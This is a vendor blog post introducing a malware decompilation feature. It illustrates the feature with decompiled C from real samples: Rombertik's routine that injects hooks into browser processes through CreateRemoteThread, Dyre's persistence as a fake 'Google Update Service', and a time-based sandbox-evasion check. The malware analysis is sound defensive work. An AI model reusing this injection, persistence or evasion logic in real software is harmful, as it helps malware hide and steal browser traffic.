Explore Joe Security Cloud Basic Accounts Contact Us
top title background image

Joe Security's Blog

Pure Innovation: Hybrid Decompilation with Joe Sandbox DEC

Published on: 30.09.2015


Joe Security is proud to announce its latest innovative technology - Hybrid Decompilation (HDC). This unique new feature builds upon Hybrid Code Analysis (HCA) to empower the malware analyst with extensive code analysis capabilities. Existing Joe Sandbox reports already include a hybrid low-level disassembly for each relevant function found during the analysis, which combines information from both static and dynamic analyses. Thanks to the Joe Sandbox DEC plugin implementing HDC, Joe Sandbox reports can now also display an equivalent C high-level source code representation for each function, which constitutes a huge boost to the process of reverse engineering.

Here is a very simple report extract to illustrate the purpose of this Hybrid Decompilation feature.
Suppose we have the following disassembly for a function in a Joe Sandbox report:


Joe Sandbox DEC will generate the following corresponding C source code:

E00406D20(CHAR* _a4) {
 long _t4;
 void* _t6;

 _t6 = CreateMutexA(0, 1, _a4);
 _t4 = GetLastError();
 if(_t4 == 0xb7) {
  ExitProcess(0);
 }
 if(_t6 != 0) {
  return ReleaseMutex(_t6);
 }
 return _t4;
}

As seen in this example, the source code highlights the function parameters and local variables, and makes its control structures and function calls much more explicit.

 

Decompilation 101

The process of translating machine or assembly code to source code is called decompilation. From a high-level perspective, decompilation is the reverse of compilation: it starts with low-level machine code and builds a higher-level representation in several incremental stages. Decompilation is usually much more efficient and gives better results if it can use symbolic information found in the binary file or in associated debug files.
Decompilation can also be seen as a natural extension to disassembly, and indeed the first stage of a decompilation engine is a disassembler. But besides the usual difficulty of code and data separation during disassembly, the decompilation process must also solve the following issues:

  • Rebuild function prototypes and infer local variables while getting rid of register and stack references.
  • Generate high-level control structures (if, switch/case, do/while/for loops) from basic jumps and compares, discovering calls to known APIs and libraries (such as PE file imports).
  • Retrieve high-level type information (including compound types such as structures and unions). 
  • Assign the correct arguments to function calls.

This schema presents the global architecture of a generic decompilation engine:


Decompilation builds on techniques developed initially for compilation, such as control and data-flow analyses, register allocation, loop transformation and alias analyses. But decompilation has its own challenges and it is usually considered extremely difficult to automatically decompile an arbitrary machine code, and even more so for obfuscated malware code for which no symbolic information is available. Keeping this in mind, the goal of Joe Sandbox DEC is to provide the user with a fast decompilation of the most relevant functions found in the analyzed sample, together with a measurement of the quality of the decompilation.

Hybrid Decompilation

Compared to a generic decompilation engine, Hybrid Decompilation introduces three powerful features:

  • Instead of running on the initial PE file, which may be packed or contain hidden code, HDC runs on PE files generated from dynamic memory snapshots which give an accurate picture of the code which is actually executed.
  • HCA provides input information to HDC such as known Windows API function calls, discovered used string values and statement execution status. This is akin to retrieving symbolic information and is very useful for achieving better decompilation results.
  • HDC has an extensive knowledge of Windows API types and function prototypes, thus enabling the use of high-level types in the output source code files.

These features make HDC a big improvement over a purely static decompilation engine:

  • "Better decompilation code coverage": all function entry points discovered by the powerful heuristics of HCA are made available as decompilation entry points.
  • "Better decompilation quality": in particular, knowledge of indirect call targets as provided by HCA makes decompilation both faster and more precise.
  • "Decompiled source code commenting": observed runtime information such as statement execution status and variable value can be added to the decompiled source code in the form of comments.

Some Hybrid Decompilation Source Code Outputs

Let us now have a look at some actual examples of HDC-generated C source codes to get a taste of the power of Hybrid Decompilation.
The first decompiled source code is extracted from the sample studied in blog post http://joe4security.blogspot.ch/2015/04/the-power-of-execution-graphs-part-13.html.


E0040912A(void* __edi, void* __eflags, long _a4) {
 long _v8;
 long _v12;
 long _v16;
 struct _SYSTEMTIME _v32;
 void* _t13;
 void* _t17;
 void* _t28;
 signed int _t29;
 void* _t30;
 void* _t32;
 CHAR* _t35;

 _t32 = __edi;
 _t35 = _a4;
 E00406DB0(_t35);
 _pop(_t29);
 GetSystemTime( &_v32);
 if(_v32.wMonth >= 0xb && _v32.wYear >= 0x7da) {
  ExitProcess(0); // executed
 }
 _t13 = E004070C0();
 _t40 = _t13;
 if(_t13 != 0) {
  E00408A06(_t29, __eflags, _t35);
  _pop(_t29);
 } else {
  E00406E00();
 }
 E004084F7(_t29, _t40, _t35);
 _t41 =  *0x4011e8 - 1;
 _pop(_t30);
 if( *0x4011e8 == 1) {
  E00409900();
 }
 E00409029(_t28, _t30, _t32, _t41);
 _push(_t35);
 _t17 = E00408220();
 if(_t17 != 0) {
  return _t17;
 } else {
  _push(_t32);
  if(_v32.wMonth >= 7 && _v32.wYear >= 0x7da) {
   CreateThread(0, 0, E004098A0, 0, 0,  &_a4);
   CreateThread(0, 0, E00407180, 0, 0,  &_v8);
   CreateThread(0, 0, E00407230, 0, 0,  &_v12);
   if( *0x4011dc == 1) {
    CreateThread(0, 0, E00407A80, 0, 0,  &_v16);
   }
  }
  L14:
  Sleep(0x3ab0);
  goto L14;
 }
}

The source code really highlights the condition on the system time under which the sample immediately terminates (see lines 18 to 20). Thanks to HDC, the comment of line 20 gives us the information that the evasive behavior has been triggered for the analyzed sample’s run. Still, the static component of Hybrid Decompilation gives information about what occurs in the non-evasive case. In particular, several thread creations may occur at lines 44-48, and the corresponding calls to CreateThread have explicit call arguments including the reference to the function executed by the new thread.
Our second decompiled source sample is a function belonging to a PE file dropped by the Rombertik malware (see analysis http://www.joesecurity.org/reports/report-f504ef6e9a269e354de802872dc5e209.html)

E00401960() {
 void _v5;
 void _v6;
 void _v7;
 int _v12;
 int _v16;
 char _v280;
 long _v292;
 long _v308;
 void* _v316;
 char _v572;
 char _v828;
 char* _t36;
 char* _t39;
 void* _t42;
 intOrPtr* _t44;
 int _t46;
 intOrPtr* _t47;
 intOrPtr* _t51;
 int _t54;
 void* _t59;
 _Unknown_base(*)()* _t62;
 void* _t69;
 void* _t71;
 void* _t74;
 int _t77;
 int _t79;
 long _t82;
 void* _t94;
 void* _t98;
 void* _t99;
 void* _t100;

 _v316 = 0x128;
 _t77 = 0x100;
 _t36 =  &_v828;
 goto L1;
 L4:
 _t79 = 0x100;
 _t39 =  &_v572;
 do {
   *_t39 = 0;
  _t39 = _t39 + 1;
  _t79 = _t79 - 1;
 } while (_t79 != 0);
 _v12 = 0x100;
 CryptStringToBinaryA("aWV4cGxvcmUuZXhl", 0x10, 1,  &_v572,  &_v12, 0, 0);
 while(1) {
  _t42 = CreateToolhelp32Snapshot(2, 0); // executed
  _v12 = _t42;
  Process32First(_t42,  &_v316); // executed
  do {
   _t44 = "chrome.exe";
   do {
    _t44 = _t44 + 1;
   } while ( *_t44 != 0);
   _t46 = StrCmpNA( &_v280, "chrome.exe", _t44 - "chrome.exe"); // executed
   if(_t46 != 0) {
    _t47 =  &_v572;
    if(_v572 == 0) {
     L20:
     if(StrCmpNA( &_v280,  &_v572, _t47 -  &_v572) != 0) {
      _t51 = "firefox.exe";
      do {
       _t51 = _t51 + 1;
      } while ( *_t51 != 0);
      if(StrCmpNA( &_v280, "firefox.exe", _t51 - "firefox.exe") != 0) {
       goto L39;
      }
      _t99 = OpenProcess(0x1fffff, 0, _v308);
      if(_t99 == 0) {
       goto L39;
      }
      _t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateFileW");
      if(_t59 == 0) {
       L38:
       CloseHandle(_t99);
       goto L39;
      }
      _v6 = 0;
      if(ReadProcessMemory(_t99, _t59,  &_v6, 1, 0) != 0 && _v6 != 0xe9) {
       _push(_t99);
       _push(E004018E0);
       L35:
       _t62 = E00402690();
       _t100 = _t100 + 8;
       if(_t62 != 0) {
        _t94 = CreateRemoteThread(_t99, 0, 0, _t62, 0, 0, 0);
        if(_t94 != 0) {
         WaitForSingleObject(_t94, 0xffffffff);
         CloseHandle(_t94);
        }
       }
      }
      goto L38;
     }
     if(E00402AE0( &_v828) == _v292) {
      goto L39;
     }
     _t99 = OpenProcess(0x1fffff, 0, _v308);
     if(_t99 == 0) {
      goto L39;
     }
     _t69 = GetProcAddress(LoadLibraryA("Wininet.dll"), "HttpSendRequestW");
     if(_t69 == 0) {
      goto L38;
     }
     _v5 = 0;
     if(ReadProcessMemory(_t99, _t69,  &_v5, 1, 0) == 0 || _v5 == 0xe9) {
      goto L38;
     } else {
      _push(_t99);
      _push(E00402040);
      goto L35;
     }
    }
    do {
     _t47 = _t47 + 1;
    } while ( *_t47 != 0);
    goto L20;
   }
   _t71 = E00402AE0( &_v828);
   _t82 = _v292;
   if(_t71 == _t82) {
    goto L39;
   }
   _t99 = OpenProcess(0x1fffff, 0, _t82);
   if(_t99 == 0) {
    goto L39;
   }
   _t74 = GetProcAddress(LoadLibraryA("Ws2_32.dll"), "WSASend");
   if(_t74 == 0) {
    goto L38;
   }
   _v7 = 0;
   if(ReadProcessMemory(_t99, _t74,  &_v7, 1, 0) == 0 || _v7 == 0xe9) {
    goto L38;
   } else {
    _push(_t99);
    _push(E004012A0);
    goto L35;
   }
   L39:
   _t98 = _v12;
   _t54 = Process32Next(_t98,  &_v316); // executed
  } while (_t54 != 0);
  if(_t98 != 0) {
   CloseHandle(_t98); // executed
  }
  Sleep(0x1388); // executed
 }
 L1:
  *_t36 = 0;
 _t36 = _t36 + 1;
 _t77 = _t77 - 1;
 if(_t77 != 0) {
  goto L1;
 } else {
  _v16 = 0x100;
  if(CryptStringToBinaryA("ZXhwbG9yZXIuZXhl", 0x10, 1,  &_v828,  &_v16, 0, 0) == 0) {
   _v16 = 0;
  }
  goto L4;
 }
}

The decompiled source code makes it clear that this function is in charge of enumerating all processes (infinite while loop starting at line 48), and to look for browser names such as “iexplore.exe” (call to StrmCmpNA at line 62, the browser name is Base64 encoded using the call to CryptStringToBinaryA on "aWV4cGxvcmUuZXhl"at line 47), “chrome.exe” (line 57), “firefox.exe” (line 67). Once a process corresponding to a particular browser is found, the function tries to create a hook in the browser memory loaded DLLs: different functions starting addresses are used for that purpose (CreateFileW for Firefox at line 74, HttpSendRequestW for Internet Explorer at line 104, and WsaSend for Chrome at line 131). Once a suitable address has been found for the hook (calls to ReadProcessMemory at lines 81, 109 and 136), the actual hook injection is performed with a call to CreateRemoteThread at line 88.

Our last decompiled source code example is extracted from the Dyre Banking Trojan. This malware achieves persistence by registering as the “Google Update” system service using the following function:

E00402900(short* _a4) {
 signed int _t2;
 void* _t5;
 int _t13;
 void* _t20;
 void* _t25;

 _t2 = OpenSCManagerW(0, 0, 2);
 _t20 = _t2;
 if(_t20 != 0) {
  WriteConsoleW(0, 0, 0, 0, 0);
  while(1) {
   _t5 = CreateServiceW(_t20, L"googleupdate", L"Google Update Service", 0xf01ff, 0x10, 
                        2, 1, _a4, 0, 0, 0, 0, 0);
   if(_t5 != 0) {
    break;
   }
   if(RtlGetLastWin32Error() != 0x431) {
    L7:
    return CloseServiceHandle(_t20) | 0xffffffff;
   } else {
    _t25 = OpenServiceW(_t20, L"googleupdate", 0xf01ff);
    if(_t25 == 0) {
     goto L7;
    } else {
     _t13 = DeleteService(_t25);
     CloseServiceHandle(_t25);
     if(_t13 != 0) {
      continue;
     } else {
      goto L7;
     }
    }
   }
   goto L9;
  }
  CloseServiceHandle(_t5);
  CloseServiceHandle(_t20);
  return 0;
 } else {
  return _t2 | 0xffffffff;
 }
 L9:
}

Once a handle to the service manager is obtained (lines 8-10), the sample tries to create a “Google Update Service” (line 13) in a loop starting at line 12. If it manages to do so, it exists the loop (line 16), otherwise it checks whether the service creation of line 13 fails with a ERROR_SERVICE_EXISTS error code 0x431 (line 18). If this is the case, it tries to delete the existing service (lines 22 to 27) then loops to restart the malicious service creation (line 29).

Conclusion


Thanks to its Hybrid Decompilation technology, Joe Sandbox DEC outputs a decompiled function which is much more readable than the associated disassembly, and thus gives a quick and precise insight about the function's functionalities. As a whole, the process of retro-engineering a complex malware is made more efficient by pinpointing hard to decompile functions and let the analyst concentrate on their study by falling back on the still available disassembly code only when necessary.